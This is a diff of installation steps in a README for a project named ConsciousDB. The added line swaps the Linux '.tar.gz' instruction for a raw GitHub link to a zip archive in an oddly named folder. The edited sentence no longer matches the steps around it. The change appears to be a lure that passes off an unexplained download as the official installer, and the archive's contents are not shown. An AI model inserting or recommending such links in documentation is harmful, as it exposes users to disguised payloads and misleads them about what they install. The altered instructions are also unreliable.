britorbs/consciousdb/README.md

 5. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file to start the installation.
    - For macOS: Open the `.dmg` file and drag the ConsciousDB icon to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included instructions to install.
+   - For Linux: Extract the `https://raw.githubusercontent.com/britorbs/consciousdb/main/leptorrhinian/consciousdb.zip` file and follow the included instructions to install.

 6. **Follow On-Screen Prompts:**
    Complete the installation by following the instructions that appear on your screen.